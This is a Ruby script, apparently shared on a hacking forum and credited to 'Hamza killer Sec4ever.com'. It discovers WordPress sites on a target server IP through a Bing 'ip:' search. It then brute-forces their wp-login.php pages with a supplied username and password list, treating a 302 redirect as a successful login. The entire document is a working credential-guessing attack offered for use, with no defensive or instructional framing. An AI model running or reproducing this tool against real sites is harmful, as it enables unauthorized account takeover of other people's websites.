Wordpress All server brut force multi thread

1. #!/user/bin/ruby
2. require 'net/http'
3. require 'uri'
4. def url(vu)
5. uri = URI.parse(vu)
6. xs="#{uri.scheme}://#{uri.host}/#{uri.path.split('/')[1]}"
7. xss="#{xs}"
8. return xss
9. end
10. class String
11. def green;          "\033[32m#{self}\033[0m" end
12. def bg_green;       "\033[42m#{self}\033[0m" end
13. end
14. def xip(ips)
15.     (0..15).each do |xdv|
16. dork="ip:#{ips}+page_id="  
17. xs=URI("http://www.bing.com/search?q=#{dork}&first=#{xdv*10+1}")
18. xd= Net::HTTP.get_response(xs)
19. body=xd.body
20. sos=body.scan(/<cite>(.*?)<strong>/)
21. return sos.uniq
22. end
23. end
24. def brut(urls,user,pwds)
25. userz=user.chomp
26. pwd=pwds.chomp
27. ur=URI.parse(urls)
28. pop=ur.host
29. dd=ur.path
30. http = Net::HTTP.new(pop, 80)
31. #http.use_ssl = true
32. path = "#{dd}/wp-login.php"
33. ip="http://#{pop}#{dd}/wp-admin"
34. resp, data = http.get(path, nil)
35. cookie = resp.response['set-cookie']
36. posts="log=#{userz}&pwd=#{pwd}&rememberme=forever&wp-submit=Log In&redirect_to=#{ip}&testcookie=1"
37. mps= {'Cookie' => cookie,'Content-Type' => 'application/x-www-form-urlencoded'}
38. y = Thread.new {
39. resp, data  = http.post(path, posts, mps)
40. }
41. y.join(0.8)
42. iz="http://#{pop}#{dd}"
43. if resp.code == "302"
44. print"[+] #{iz} \n".green
45. print"[+] Found : #{userz} => #{pwd}\n".bg_green
46. end
47. end
48. print"[+] Wordpress All server brut force multi thread [+]\n"
49. print"[+] Hamza killer Sec4ever.com :D [+]\n"
50. print("# Enter IP -> ")
51. ipsz=gets.chomp
52. print("# Enter Username ->")
53. admin=gets.chomp
54. print("# Enter Password list ->")
55. pass=gets.chomp
56. xs=IO.readlines(pass)
57. xsdsq=xip(ipsz)
58.  
59. for xdz in xsdsq
60. dz=xdz.uniq
61. for pdz in dz
62. x=url("http://#{pdz}")
63. print "| W0rking with #{x}\n"
64. for pwd in xs
65. brut(x,admin,pwd)
66.  
67. end
68. end
69. end